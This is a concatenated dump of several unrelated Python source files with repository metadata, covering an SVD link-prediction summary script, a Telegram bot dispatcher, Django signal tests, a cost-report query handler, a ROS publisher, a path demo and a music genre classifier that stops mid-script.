] | 16 | 2021-02-18T15:53:24.000Z | 2021-11-25T19:50:03.000Z | experiments/summarize_svdf_linkpred_sweep.py | samihaija/tf-fsvd | 677cad8cfa21668369ce39c515874dabfbc021d5 | [
"MIT"
] | 1 | 2021-05-13T05:23:52.000Z | 2021-05-13T05:23:52.000Z | experiments/summarize_svdf_linkpred_sweep.py | samihaija/tf-fsvd | 677cad8cfa21668369ce39c515874dabfbc021d5 | [
"MIT"
] | 2 | 2021-02-24T16:03:30.000Z | 2021-03-13T14:17:06.000Z | import os
import glob
import collections
import json
import numpy as np
from absl import app, flags
flags.DEFINE_string('results_dir', 'results/linkpred_d_sweep/fsvd',
'Directory where run files are written.')
FLAGS = flags.FLAGS
def main(_):
files = glob.glob(os.path.join(FLAGS.results_dir, '*'))
stats = collections.defaultdict(list)
for fname in files:
#print(fname)
dataset, d, run_id = fname.split('/')[-1].replace('.txt', '').split('_')
d = int(d)
lines = open(fname).read().split('\n')
if not lines[-1]: lines=lines[:-1] # Remove last line (if blank)
data = json.loads(lines[-1])
#print(data)
stats[(dataset, d)].append((data['auc'], data['time']))
print('model,dataset,dim,test,time')
for k in list(sorted(stats.keys())):
stats[k] = np.array(stats[k])
dataset, d = k
# Total embedding dimension is twice the rank, as node is embedded in U and V.
d *= 2
print('fsvd,%s,%i,%g,%g' % (
dataset, d, np.mean(stats[k][:, 0]), np.mean(stats[k][:, 1])))
if __name__ == '__main__':
app.run(main)
| 29.513514 | 82 | 0.623626 | 166 | 1,092 | 4.006024 | 0.512048 | 0.04812 | 0.033083 | 0.03609 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007964 | 0.195055 | 1,092 | 36 | 83 | 30.333333 | 0.748578 | 0.117216 | 0 | 0 | 0 | 0 | 0.151042 | 0.058333 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.214286 | 0 | 0.25 | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
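# --- Usage sketch (not from the original script) ---
# The script expects run files named <dataset>_<d>_<run>.txt whose last
# line is a JSON object with "auc" and "time" keys; the file name below
# is hypothetical.
# import json
# with open('results/linkpred_d_sweep/fsvd/cora_16_0.txt', 'w') as f:
#     f.write(json.dumps({'auc': 0.91, 'time': 1.7}) + '\n')
# Then summarize with:
#   python summarize_svdf_linkpred_sweep.py --results_dir=results/linkpred_d_sweep/fsvd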
e2deb7eb7ee2e7c59cb13a91610999e85e9556e5 | 3,737 | py | Python | telegram_crypto_price_bot/message_dispatcher.py | RBBOTDEVELOPER/telegram_crypto_price_bot | 88391e22c22bdfecb30bacba9b3bb103ef453d9e | [
"MIT"
] | null | null | null | telegram_crypto_price_bot/message_dispatcher.py | RBBOTDEVELOPER/telegram_crypto_price_bot | 88391e22c22bdfecb30bacba9b3bb103ef453d9e | [
"MIT"
] | null | null | null | telegram_crypto_price_bot/message_dispatcher.py | RBBOTDEVELOPER/telegram_crypto_price_bot | 88391e22c22bdfecb30bacba9b3bb103ef453d9e | [
"MIT"
] | null | null | null | # Copyright (c) 2021 Emanuele Bellocchia
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# Imports
#
import pyrogram
from typing import Any
from telegram_crypto_price_bot.config import Config
from telegram_crypto_price_bot.logger import Logger
from telegram_crypto_price_bot.message_sender import MessageSender
from telegram_crypto_price_bot.translation_loader import TranslationLoader
#
# Classes
#
# Message dispatcher class
class MessageDispatcher:
# Constructor
def __init__(self,
config: Config,
logger: Logger,
translator: TranslationLoader) -> None:
self.config = config
self.logger = logger
self.translator = translator
# Dispatch command
def Dispatch(self,
client: pyrogram.Client,
message: pyrogram.types.Message,
**kwargs: Any) -> None:
# New chat created
if message.group_chat_created is not None:
self.__OnCreatedChat(client, message, **kwargs)
# A member left the chat
if message.left_chat_member is not None:
self.__OnLeftMember(client, message, **kwargs)
# A member joined the chat
if message.new_chat_members is not None:
self.__OnJoinedMember(client, message, **kwargs)
# Function called when a new chat is created
def __OnCreatedChat(self,
client,
message: pyrogram.types.Message,
**kwargs: Any) -> None:
# Send the welcome message
MessageSender(client, self.config, self.logger).SendMessage(
message.chat,
self.translator.GetSentence("BOT_WELCOME_MSG")
)
# Function called when a member left the chat
def __OnLeftMember(self,
client,
message: pyrogram.types.Message,
**kwargs: Any) -> None:
# If the member is the bot itself, remove the chat from the scheduler
if message.left_chat_member.is_self:
kwargs["coin_info_scheduler"].ChatLeft(message.chat)
# Function called when a member joined the chat
def __OnJoinedMember(self,
client,
message: pyrogram.types.Message,
**kwargs: Any) -> None:
# If the member is the bot itself, send the welcome message
for member in message.new_chat_members:
if member.is_self:
MessageSender(client, self.config, self.logger).SendMessage(
message.chat,
self.translator.GetSentence("BOT_WELCOME_MSG")
)
break
| 39.336842 | 79 | 0.652395 | 443 | 3,737 | 5.395034 | 0.345372 | 0.03682 | 0.030126 | 0.038494 | 0.312971 | 0.206695 | 0.185774 | 0.185774 | 0.166527 | 0.145607 | 0 | 0.001499 | 0.286058 | 3,737 | 94 | 80 | 39.755319 | 0.894303 | 0.395504 | 0 | 0.346939 | 0 | 0 | 0.022062 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.102041 | false | 0 | 0.122449 | 0 | 0.244898 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
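# --- Usage sketch (not from the original module) ---
# One way to wire the dispatcher into pyrogram; the handler registration
# and the coin_info_scheduler object are assumptions for illustration.
# from pyrogram import Client
# from pyrogram.handlers import MessageHandler
#
# dispatcher = MessageDispatcher(config, logger, translator)
#
# def _on_message(client, message):
#     dispatcher.Dispatch(client, message,
#                         coin_info_scheduler=coin_info_scheduler)
#
# app = Client("price_bot")
# app.add_handler(MessageHandler(_on_message))
# app.run()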
e2e20661e6fd1d16b0a0f47887066e3517db1d11 | 485 | py | Python | solutions/tier_04/python/uri_1766_o_elfo_das_trevas.py | EstevaoNaval/URI_repository | 373681078f237231a6ec2c5a2ab04be434f54968 | [
"MIT"
] | null | null | null | solutions/tier_04/python/uri_1766_o_elfo_das_trevas.py | EstevaoNaval/URI_repository | 373681078f237231a6ec2c5a2ab04be434f54968 | [
"MIT"
] | null | null | null | solutions/tier_04/python/uri_1766_o_elfo_das_trevas.py | EstevaoNaval/URI_repository | 373681078f237231a6ec2c5a2ab04be434f54968 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
qntCaso = int(input())
for caso in range(qntCaso):
numTotalRena, numTotalRenaPuxaraoTreno = map(int, input().split())
listRena = [list(map(str, input().split())) for linha in range(numTotalRena)]
    listRena = sorted(listRena, key=lambda x: (-int(x[1]), int(x[2]), float(x[3]), x[0]))
    print("CENARIO {" + str(caso + 1) + "}")
for indiceRena in range(numTotalRenaPuxaraoTreno): print("{} - {}".format(indiceRena + 1, listRena[indiceRena][0])) | 44.090909 | 119 | 0.637113 | 62 | 485 | 4.983871 | 0.5 | 0.067961 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019465 | 0.152577 | 485 | 11 | 119 | 44.090909 | 0.73236 | 0.043299 | 0 | 0 | 0 | 0 | 0.036717 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2e20f39835f5c3307a75b90031b87737e56b9cf | 2,754 | py | Python | tests/test_signals.py | appsembler/course-cccess-groups | d9c59dc55a3d021196c50e1080d3a251b4751780 | [
"MIT"
] | null | null | null | tests/test_signals.py | appsembler/course-cccess-groups | d9c59dc55a3d021196c50e1080d3a251b4751780 | [
"MIT"
] | null | null | null | tests/test_signals.py | appsembler/course-cccess-groups | d9c59dc55a3d021196c50e1080d3a251b4751780 | [
"MIT"
] | null | null | null | """
Tests for signal handlers.
"""
import logging
import pytest
from course_access_groups.models import Membership
from course_access_groups.signals import (
on_learner_account_activated,
on_learner_register,
)
from test_utils.factories import (
MembershipRuleFactory,
UserFactory,
UserOrganizationMappingFactory,
)
@pytest.mark.django_db
@pytest.mark.parametrize('receiver_function', [
on_learner_account_activated,
on_learner_register,
])
def test_working_membership_rule_signals(receiver_function):
"""
Ensure USER_ACCOUNT_ACTIVATED and REGISTER_USER signals are processed correctly.
"""
rule = MembershipRuleFactory(domain='example.com')
mapping = UserOrganizationMappingFactory.create(
user__email='someone@example.com',
user__is_active=True,
organization=rule.group.organization,
)
receiver_function(object(), mapping.user)
assert Membership.objects.filter(user=mapping.user).exists(), 'Should create the rule'
receiver_function(object(), mapping.user) # Should not fail when receiving the signal twice
@pytest.mark.django_db
def test_register_user_signal_inactive_user(caplog):
"""
Ensure REGISTER_USER signal is not processed for inactive users.
Otherwise, `Membership.create_from_rules` would raise an exception.
"""
caplog.set_level(logging.INFO) # Ensure INFO logs are captured
rule = MembershipRuleFactory(domain='example.com')
mapping = UserOrganizationMappingFactory.create(
user__email='someone@example.com',
user__is_active=False,
organization=rule.group.organization,
)
on_learner_register(object(), mapping.user)
assert not Membership.objects.filter(user=mapping.user).exists(), 'Should not create the rule for inactive user'
assert 'Received REGISTER_USER signal for inactive user' in caplog.text
@pytest.mark.django_db
@pytest.mark.parametrize('receiver_function,signal_name', [
[on_learner_account_activated, 'USER_ACCOUNT_ACTIVATED'],
[on_learner_register, 'REGISTER_USER'],
])
def test_failed_membership_rule_signals(monkeypatch, caplog, receiver_function, signal_name):
"""
Ensure errors in USER_ACCOUNT_ACTIVATED and REGISTER_USER are logged.
"""
monkeypatch.delattr(Membership, 'create_from_rules') # Act as if create_from_rules() don't work!
user = UserFactory.create(email='someone@example.com')
MembershipRuleFactory(domain='example.com')
with pytest.raises(AttributeError):
receiver_function(object(), user)
assert 'Error receiving {signal_name} signal for user'.format(signal_name=signal_name) in caplog.text
assert 'someone@example.com' in caplog.text
assert 'AttributeError' in caplog.text
| 33.585366 | 116 | 0.755628 | 326 | 2,754 | 6.144172 | 0.303681 | 0.031453 | 0.033949 | 0.037444 | 0.352971 | 0.303545 | 0.268597 | 0.22666 | 0.176735 | 0.121817 | 0 | 0 | 0.153595 | 2,754 | 81 | 117 | 34 | 0.859288 | 0.157226 | 0 | 0.358491 | 0 | 0 | 0.167551 | 0.022546 | 0 | 0 | 0 | 0 | 0.113208 | 1 | 0.056604 | false | 0 | 0.09434 | 0 | 0.150943 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2e2f5a7e716d47c2bc599311bb54fb09059029e | 12,180 | py | Python | koku/api/query_handler.py | Vasyka/koku | b5aa9ec41c3b0821e74afe9ff3a5ffaedb910614 | [
"Apache-2.0"
] | 2 | 2022-01-12T03:42:39.000Z | 2022-01-12T03:42:40.000Z | koku/api/query_handler.py | Vasyka/koku | b5aa9ec41c3b0821e74afe9ff3a5ffaedb910614 | [
"Apache-2.0"
] | null | null | null | koku/api/query_handler.py | Vasyka/koku | b5aa9ec41c3b0821e74afe9ff3a5ffaedb910614 | [
"Apache-2.0"
] | 1 | 2021-07-21T09:33:59.000Z | 2021-07-21T09:33:59.000Z | #
# Copyright 2021 Red Hat Inc.
# SPDX-License-Identifier: Apache-2.0
#
"""Query Handling for all APIs."""
import datetime
import logging
from dateutil import parser
from dateutil import relativedelta
from django.core.exceptions import FieldDoesNotExist
from django.db.models.functions import TruncDay
from django.db.models.functions import TruncMonth
from pytz import UTC
from api.query_filter import QueryFilter
from api.query_filter import QueryFilterCollection
from api.utils import DateHelper
LOG = logging.getLogger(__name__)
WILDCARD = "*"
class TruncMonthString(TruncMonth):
"""Class to handle string formated day truncation."""
def convert_value(self, value, expression, connection):
"""Convert value to a string after super."""
value = super().convert_value(value, expression, connection)
return value.strftime("%Y-%m")
class TruncDayString(TruncDay):
"""Class to handle string formated day truncation."""
def convert_value(self, value, expression, connection):
"""Convert value to a string after super."""
value = super().convert_value(value, expression, connection)
return value.strftime("%Y-%m-%d")
class QueryHandler:
"""Handles report queries and responses."""
def __init__(self, parameters):
"""Establish query handler.
Args:
parameters (QueryParameters): parameter object for query
"""
LOG.debug(f"Query Params: {parameters}")
self.dh = DateHelper()
parameters = self.filter_to_order_by(parameters)
self.tenant = parameters.tenant
self.access = parameters.access
self.parameters = parameters
self.default_ordering = self._mapper._report_type_map.get("default_ordering")
self.time_interval = []
self._max_rank = 0
self.time_scope_units = self.parameters.get_filter("time_scope_units")
if self.parameters.get_filter("time_scope_value"):
self.time_scope_value = int(self.parameters.get_filter("time_scope_value"))
# self.start_datetime = parameters["start_date"]
# self.end_datetime = parameters["end_date"]
for param, attr in [("start_date", "start_datetime"), ("end_date", "end_datetime")]:
p = self.parameters.get(param)
if p:
setattr(self, attr, datetime.datetime.combine(parser.parse(p).date(), self.dh.midnight, tzinfo=UTC))
else:
setattr(self, attr, None)
if self.resolution == "monthly":
self.date_to_string = lambda dt: dt.strftime("%Y-%m")
self.string_to_date = lambda dt: datetime.datetime.strptime(dt, "%Y-%m").date()
self.date_trunc = TruncMonthString
self.gen_time_interval = DateHelper().list_months
else:
self.date_to_string = lambda dt: dt.strftime("%Y-%m-%d")
self.string_to_date = lambda dt: datetime.datetime.strptime(dt, "%Y-%m-%d").date()
self.date_trunc = TruncDayString
self.gen_time_interval = DateHelper().list_days
if not (self.start_datetime or self.end_datetime):
self._get_timeframe()
self._create_time_interval()
# FIXME: move this to a standalone utility function.
@staticmethod
def has_wildcard(in_list):
"""Check if list has wildcard.
Args:
in_list (List[String]): List of strings to check for wildcard
Return:
(Boolean): if wildcard is present in list
"""
if isinstance(in_list, bool):
return False
if not in_list:
return False
return any(WILDCARD == item for item in in_list)
@property
def order(self):
"""Extract order_by parameter and apply ordering to the appropriate field.
Returns:
(String): Ordering value. Default is '-total'
Example:
`order_by[total]=asc` returns `total`
`order_by[total]=desc` returns `-total`
"""
order_map = {"asc": "", "desc": "-"}
return f"{order_map[self.order_direction]}{self.order_field}"
@property
def order_field(self):
"""Order-by field name.
The default is 'total'
"""
order_by = self.parameters.get("order_by", self.default_ordering)
return list(order_by.keys()).pop()
@property
def order_direction(self):
"""Order-by orientation value.
Returns:
(str) 'asc' or 'desc'; default is 'desc'
"""
order_by = self.parameters.get("order_by", self.default_ordering)
return list(order_by.values()).pop()
@property
def max_rank(self):
"""Return the max rank of a ranked list."""
return self._max_rank
@max_rank.setter
def max_rank(self, max_rank):
"""Max rank setter."""
self._max_rank = max_rank
@property
def resolution(self):
"""Extract resolution or provide default.
Returns:
(String): The value of how data will be sliced.
"""
return self.parameters.get_filter("resolution", default="daily")
def check_query_params(self, key, in_key):
"""Test if query parameters has a given key and key within it.
Args:
key (String): key to check in query parameters
in_key (String): key to check if key is found in query parameters
Returns:
(Boolean): True if they keys given appear in given query parameters.
"""
return self.parameters and key in self.parameters and in_key in self.parameters.get(key) # noqa: W504
def get_time_scope_units(self):
"""Extract time scope units or provide default.
Returns:
(String): The value of how data will be sliced.
"""
if self.time_scope_units:
return self.time_scope_units
time_scope_units = self.parameters.get_filter("time_scope_units", default="day")
self.time_scope_units = time_scope_units
return self.time_scope_units
def get_time_scope_value(self):
"""Extract time scope value or provide default.
Returns:
(Integer): time relative value providing query scope
"""
if self.time_scope_value:
return self.time_scope_value
time_scope_value = self.parameters.get_filter("time_scope_value", default=-10)
self.time_scope_value = int(time_scope_value)
return self.time_scope_value
def _get_timeframe(self):
"""Obtain timeframe start and end dates.
Returns:
(DateTime): start datetime for query filter
(DateTime): end datetime for query filter
"""
time_scope_value = self.get_time_scope_value()
time_scope_units = self.get_time_scope_units()
start = None
end = None
if time_scope_units == "month":
if time_scope_value == -1:
# get current month
start = self.dh.this_month_start
end = self.dh.today
else:
# get previous month
start = self.dh.last_month_start
end = self.dh.last_month_end
else:
if time_scope_value == -10:
# get last 10 days
start = self.dh.n_days_ago(self.dh.this_hour, 9)
end = self.dh.this_hour
else:
# get last 30 days
start = self.dh.n_days_ago(self.dh.this_hour, 29)
end = self.dh.this_hour
self.start_datetime = start
self.end_datetime = end
return (self.start_datetime, self.end_datetime, self.time_interval)
def _create_time_interval(self):
"""Create list of date times in interval.
Returns:
(List[DateTime]): List of all interval slices by resolution
"""
self.time_interval = sorted(self.gen_time_interval(self.start_datetime, self.end_datetime))
return self.time_interval
def _get_date_delta(self):
"""Return a time delta."""
if self.time_scope_value in [-1, -2]:
date_delta = relativedelta.relativedelta(months=abs(self.time_scope_value))
elif self.time_scope_value == -30:
date_delta = datetime.timedelta(days=30)
else:
date_delta = datetime.timedelta(days=10)
return date_delta
def _get_time_based_filters(self, delta=False):
if delta:
date_delta = self._get_date_delta()
start = self.start_datetime - date_delta
end = self.end_datetime - date_delta
else:
start = self.start_datetime
end = self.end_datetime
start_filter = QueryFilter(field="usage_start", operation="gte", parameter=start.date())
end_filter = QueryFilter(field="usage_end", operation="lte", parameter=end.date())
return start_filter, end_filter
def _get_filter(self, delta=False):
"""Create dictionary for filter parameters.
Args:
delta (Boolean): Construct timeframe for delta
Returns:
(Dict): query filter dictionary
"""
filters = QueryFilterCollection()
# add time constraint filters
start_filter, end_filter = self._get_time_based_filters(delta)
filters.add(query_filter=start_filter)
filters.add(query_filter=end_filter)
return filters
def filter_to_order_by(self, parameters): # noqa: C901
"""Remove group_by[NAME]=* and replace it with group_by[NAME]=X.
The parameters object contains a list of filters and a list of group_bys.
For example, if the parameters object contained the following:
group_by[X] = Y
group_by[Z] = * # removes this line
filter[Z] = L
filter[X] = Y
The returned parameters object would contain lists that look like this:
group_by[X] = Y
group_by[Z] = L # adds this line
filter[Z] = L
filter[X] = Y
Thereby removing the star when there is a filter provided.
Args:
parameters (QueryParameters): The parameters object
Returns:
parameters (QueryParameters): The parameters object
"""
# find if there is a filter[key]=value that matches this group_by[key]=value
for key, value in parameters.parameters.get("group_by", {}).items():
if self.has_wildcard(value):
filter_value = parameters.parameters.get("filter", {}).get(key)
if filter_value:
parameters.parameters["group_by"][key] = filter_value
return parameters
def set_access_filters(self, access, filt, filters):
"""
        Sets the access filters to ensure RBAC restrictions given the user's access,
        the current filter, and the filter collection.
        Args:
            access (list) the list containing the user's relevant access
            filt (list or dict) contains the filters that need to be applied
            filters (QueryFilterCollection) the filter collection to add the new filters to
returns:
None
"""
for _filt in filt if isinstance(filt, list) else [filt]:
check_field_type = None
try:
if hasattr(self, "query_table"):
# Reports APIs
check_field_type = self.query_table._meta.get_field(_filt.get("field", "")).get_internal_type()
elif hasattr(self, "data_sources"):
# Tags APIs
check_field_type = (
self.data_sources[0]
.get("db_table")
._meta.get_field(_filt.get("field", ""))
.get_internal_type()
)
except FieldDoesNotExist:
pass
_filt["operation"] = "contains" if check_field_type == "ArrayField" else "in"
q_filter = QueryFilter(parameter=access, **_filt)
filters.add(q_filter)
| 34.213483 | 116 | 0.611987 | 1,462 | 12,180 | 4.905609 | 0.19015 | 0.041411 | 0.037089 | 0.020078 | 0.301032 | 0.232989 | 0.198968 | 0.186559 | 0.147239 | 0.147239 | 0 | 0.003959 | 0.29491 | 12,180 | 355 | 117 | 34.309859 | 0.83116 | 0.271921 | 0 | 0.152047 | 0 | 0 | 0.052748 | 0.006271 | 0 | 0 | 0 | 0.002817 | 0 | 1 | 0.116959 | false | 0.005848 | 0.064327 | 0 | 0.321637 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
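# --- Usage sketch (not from the original module) ---
# Illustrates the wildcard replacement performed by filter_to_order_by():
# a group_by value of "*" is swapped for the matching filter value, so
# ordering applies to a concrete key. Plain dicts stand in for the real
# QueryParameters object.
params = {"group_by": {"account": ["*"], "region": ["us-east-1"]},
          "filter": {"account": ["12345"]}}
for key, value in params["group_by"].items():
    if QueryHandler.has_wildcard(value):
        filter_value = params["filter"].get(key)
        if filter_value:
            params["group_by"][key] = filter_value
assert params["group_by"]["account"] == ["12345"]
assert params["group_by"]["region"] == ["us-east-1"]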
e2e4d33ff1712d3173ec4251c6fe16e0f15be96e | 492 | py | Python | week2/scripts/hello_publisher.py | ajaykrishna1878/Robotics-Automation-QSTP-2021 | f5b8626db20a60f9dd923bab5a0bec118d0abc67 | [
"MIT"
] | null | null | null | week2/scripts/hello_publisher.py | ajaykrishna1878/Robotics-Automation-QSTP-2021 | f5b8626db20a60f9dd923bab5a0bec118d0abc67 | [
"MIT"
] | null | null | null | week2/scripts/hello_publisher.py | ajaykrishna1878/Robotics-Automation-QSTP-2021 | f5b8626db20a60f9dd923bab5a0bec118d0abc67 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import rospy
from std_msgs.msg import String
class hello:
def __init__(self):
self.word = "Hello,"
self.pub = rospy.Publisher('/hello', String, queue_size=1)
self.rate = rospy.Rate(1)
def publish_word(self):
while not rospy.is_shutdown():
self.pub.publish(self.word)
self.rate.sleep()
if __name__ == '__main__':
rospy.init_node('hello_publisher')
object = hello()
object.publish_word() | 24.6 | 66 | 0.623984 | 64 | 492 | 4.5 | 0.53125 | 0.055556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008108 | 0.247967 | 492 | 20 | 67 | 24.6 | 0.77027 | 0.042683 | 0 | 0 | 0 | 0 | 0.07431 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.133333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
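# --- Usage sketch (not from the original node) ---
# A matching subscriber for the /hello topic published above; run it in a
# second terminal alongside the publisher (a roscore must be running).
import rospy
from std_msgs.msg import String

def callback(msg):
    rospy.loginfo(msg.data)

if __name__ == '__main__':
    rospy.init_node('hello_subscriber')
    rospy.Subscriber('/hello', String, callback)
    rospy.spin()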
e2e60fefd12f980302a3f8d0677aef2cf55d0964 | 1,348 | py | Python | demos/path/demo_path.py | WisconsinAutonomous/wa_simulator | 405a086b16f262fc82513ca9b23fd040e6375945 | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 5 | 2021-02-14T03:56:07.000Z | 2021-12-16T04:46:54.000Z | demos/path/demo_path.py | WisconsinAutonomous/wa_simulator | 405a086b16f262fc82513ca9b23fd040e6375945 | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1 | 2021-02-05T19:30:55.000Z | 2021-02-05T19:51:21.000Z | demos/path/demo_path.py | WisconsinAutonomous/wa_simulator | 405a086b16f262fc82513ca9b23fd040e6375945 | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 3 | 2021-09-20T21:21:12.000Z | 2022-01-09T20:49:46.000Z | # Simple path demo
# Meant to demonstrate the WA Simulator API
# -----------------------------------------------------------------
# Import the simulator
import wa_simulator as wa
import matplotlib.pyplot as plt
# Command line arguments
parser = wa.WAArgumentParser(use_sim_defaults=False)
parser.add_argument("-p", "--plot", action="store_true", help="Plot the paths", default=False)
args = parser.parse_args()
def main():
# Load data points from a csv file
filename = wa.get_wa_data_file("paths/sample_medium_loop.csv")
points = wa.load_waypoints_from_csv(filename, delimiter=",") * 2
# Create the path
path1 = wa.WASplinePath(points, num_points=1000)
# Create another path
points = [[9, 8, 0.5], [20, 5, 0.5], [25, 15, 0.5], [34, 24, 0.5],
[35, 28, 0.5], [70, 18, 0.5], [130, 98, 0.5]]
path2 = wa.WASplinePath(points, num_points=1000, is_closed=False)
# Create a third path using a json
filename = wa.get_wa_data_file("paths/sample_medium_loop.json")
path3 = wa.create_path_from_json(filename)
# Plot, if desired
if args.plot:
path1.plot("k", show=False)
path2.plot("b", show=False)
path3.plot("r", show=True)
else:
print("'-p' option not passed. Nothing will be displayed. Add '-h' for help.")
if __name__ == "__main__":
main()
| 31.348837 | 94 | 0.626113 | 196 | 1,348 | 4.137755 | 0.505102 | 0.017263 | 0.032059 | 0.036991 | 0.189889 | 0.189889 | 0.108508 | 0.108508 | 0.108508 | 0.108508 | 0 | 0.050645 | 0.194362 | 1,348 | 42 | 95 | 32.095238 | 0.696133 | 0.212908 | 0 | 0 | 0 | 0 | 0.161905 | 0.054286 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0.045455 | 0.090909 | 0 | 0.136364 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2e6e9f256351ec45645abb75d19744b0bc45894 | 4,684 | py | Python | Practice2/Lab3-2_Genre_Classification.py | kiseyno92/SNU_ML | be48a5c570ef59dc2b5a782c828536e100d7f0eb | [
"MIT"
] | 1 | 2017-08-10T10:16:32.000Z | 2017-08-10T10:16:32.000Z | Practice2/Lab3-2_Genre_Classification.py | kiseyno92/SNU_ML | be48a5c570ef59dc2b5a782c828536e100d7f0eb | [
"MIT"
] | null | null | null | Practice2/Lab3-2_Genre_Classification.py | kiseyno92/SNU_ML | be48a5c570ef59dc2b5a782c828536e100d7f0eb | [
"MIT"
] | null | null | null |
# coding: utf-8
# ### Machine Learning Application - Genre Classification
# UDSL-SNU Big Data Academy
# 20170725
# ##### Import libraries
# In[1]:
import h5py
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import accuracy_score, confusion_matrix
from sklearn import svm
from sklearn.mixture import GaussianMixture
# ##### Load Data
# In[ ]:
with h5py.File('data/gtzan_mfcc.h', 'r') as f:
X = np.asarray(f['X'])
y = np.asarray(f['y'])
genres = list(f['genres'])
# 1 audio clip has 120 dimensions:
# the mean and std of 60 per-frame features,
# where 60 features = 20 x (mfcc + delta_mfcc + double_delta_mfcc)
# In[ ]:
print('X.shape : {}'.format(X.shape))
print('y.shape : {}'.format(y.shape))
# In[ ]:
print('unique y : {}'.format(np.unique(y)))
# In[ ]:
plt.hist(y, range=[0,10])
plt.xlabel('y value')
plt.ylabel('count')
plt.title('Class distribution of GTZAN')
plt.show()
# ##### Train-test split
# In[ ]:
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, stratify=y)
# ##### Linear SVM
# In[ ]:
linearSVM = svm.LinearSVC(C=.1, max_iter=100)
linearSVM.fit(X_train, y_train)
# Predicted value from SVM model
# In[ ]:
y_pred_SVM_train = linearSVM.predict(X_train)
y_pred_SVM = linearSVM.predict(X_test)
# In[ ]:
print ('(SVM)train acc : %f'% accuracy_score(y_train, y_pred_SVM_train))
print ('(SVM)test acc : %f'% accuracy_score(y_test, y_pred_SVM))
print ('(SVM)confusion matrix : ')
print (confusion_matrix(y_test, y_pred_SVM))
# ##### GMM model
# Each GMM learns the statistical distribution of one class,
# so 10 GMMs are required here (one per genre)
# In[ ]:
unique_class = range(10)
GMMs = dict() # array of GMM for each class
for c in unique_class :
GMMs[c] = GaussianMixture(n_components=32, covariance_type='full',
tol = 0.05, reg_covar=3)
index_gmm = np.where(y_train==c)[0]
GMMs[c].fit(X_train[index_gmm])
# Scoring X using GMM
# In[ ]:
train_scores = list()
test_scores = list()
for c in unique_class :
train_scores.append(GMMs[c].score_samples(X_train))
